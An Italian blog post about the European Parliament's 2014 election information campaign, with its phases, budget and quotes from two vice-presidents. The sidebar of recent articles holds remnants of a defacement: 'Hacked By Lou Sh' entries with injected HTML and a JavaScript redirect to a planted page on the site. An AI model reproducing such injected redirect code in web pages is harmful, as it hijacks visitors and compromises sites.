EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

“Agire, Reagire, Decidere”: ora tocca a noi!




Informare e far partecipare: le parole d’ordine in vista delle elezioni europarlamentari del maggio 2014

Coinvolgere maggiormente i cittadini, informarli sull’importanza del loro voto ma anche sui rinnovati poteri del Parlamento europeo: ecco gli obiettivi della campagna informativa messa in atto dall’Europarlamento. I cittadini europei sono i principali artefici del futuro dell’UE, il loro voto rappresenta il momento più alto di partecipazione nel processo di costruzione dell’Europa che verrà: per questo motivo Bruxelles ha deciso di dare il via ad una iniziativa trasparente, appassionante e chiara per le prossime elezioni europarlamentari.

Agire, Reagire, Decidere”: è questo lo slogan scelto dal Parlamento europeo per lanciare la sua nuova campagna di informazione e di sensibilizzazione relativa alle elezioni parlamentari del prossimo maggio. L’iniziativa, avviata il 10 settembre scorso, si propone di coinvolgere in maniera più concreta i cittadini europei, rendendoli coscienti del loro ruolo fondamentale nel decidere la strada che l’UE dovrà percorrere nel suo futuro, e di assicurare un’ampia partecipazione alle urne europee.

JPEG - 9.4 Kb
"Agire, Reagire, Decidere"

Lo slogan della campagna informativa del Parlamento

Le elezioni europee si svolgeranno tra il 22 e il 25 maggio 2014 e coinvolgeranno circa cinquecento milioni di persone. Sebbene sia ancora lontano il mese di maggio, Bruxelles non ha voluto perdere tempo e ha cominciato la sua campagna informativa al servizio del cittadino. L’iniziativa del Parlamento sarà articolata in più fasi ed entrerà maggiormente nel vivo con l’avvicinarsi delle date del voto.

Il primo step è stata la definizione di uno slogan, la messa in atto di un video e proseguirà con la spiegazione ai cittadini delle nuove mansioni del Parlamento (in primis l’elezione diretta del Presidente della Commissione, ma non solo) e delle relative conseguenze per coloro che vivono in Europa.

Da ottobre fino a febbraio verranno trattati, nelle varie città europee, i cinque temi chiave della campagna di informazione, ovvero economia, denaro, qualità della vita, Europa nel mondo e occupazione. Dal mese di febbraio inizierà la vera campagna elettorale che accompagnerà i cittadini fino alle elezioni.

Tuttavia, la campagna informativa del Parlamento, non si concluderà con i risultati delle urne ma proseguirà anche nel post-elezioni, andandosi a concentrare sul nuovo Parlamento che avrà già il suo da fare con l’inaugurazione della nuova Commissione europea e con l’elezione del Presidente di quest’ultima.

I vicepresidenti del Parlamento europeo responsabili per la comunicazione hanno esposto i fini ultimi della campagna e le ragioni che li hanno spinti ad adottare questa iniziativa.

JPEG - 18.3 Kb
Anni Podimata e Othmar Karas

I vicepresidenti del Parlamento europeo responsabili per la comunicazione

Il vicepresidente Anni Podimata, membro del Gruppo dell’Alleanza Progressista di Socialisti e Democratici al Parlamento Europeo, si è così espressa: “L’unica strada per legittimare e influenzare il processo decisionale dell’UE passa attraverso il Parlamento europeo. Vi è la percezione che, nel corso dell’attuale crisi economica, al processo decisionale politico dell’UE sia mancata un’adeguata legittimazione. Solo i cittadini, gli elettori UE, detengono l’esclusiva possibilità di determinare le maggioranze politiche del Parlamento, che indicherà la strada per forgiare la legislazione, sfidando la cattiva politica e portando avanti il dibattito nei cinque anni successivi alle elezioni”.

Il vicepresidente Othmar Karas, appartenente al Partito Popolare Europeo, ha ribadito invece l’importanza di queste elezioni e ha spiegato: “Il Parlamento europeo è la Camera dei cittadini dell’UE - noi diamo voce ai cittadini nel processo decisionale dell’UE. Questa volta è diverso. La campagna ci condurrà alle elezioni europee del 22-25 maggio 2014, ma anche oltre, fino a quando il Parlamento eleggerà il Presidente della Commissione europea e approverà l’agenda politica della nuova Commissione”.

La campagna informativa avrà un costo di sedici milioni di euro e si svolgerà in tutti e ventotto gli Stati membri e in ventiquattro lingue.

JPEG - 297 Kb
Lo slogan campeggia sulla sede dell’Europarlamento a Bruxelles

E’ dunque ormai evidente come l’Europarlamento si stia sforzando per sensibilizzare i cittadini e far capire ad essi come sia determinante e attivo il loro ruolo nell’influenzare il cammino dell’Europa. Con questa campagna di informazione appare ben chiara l’importanza che viene data al cittadino e alle sue opinioni, mettendolo in condizioni di capire la sua posizione all’interno del processo decisionale dell’UE.

Vi lasciamo i link dei siti dedicati ai cittadini europei (http://annoeuropeocittadini.politic... e http://europa.eu/citizens-2013/) e il link del video italiano con lo slogan del Parlamento europeo.



Nessun commento
ds Aggiungere un commento

Autori

Claudio Pietrotti
Iscritto al corso di laurea in Scienze della Comunicazione presso l’università di Roma Tor Vergata.



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France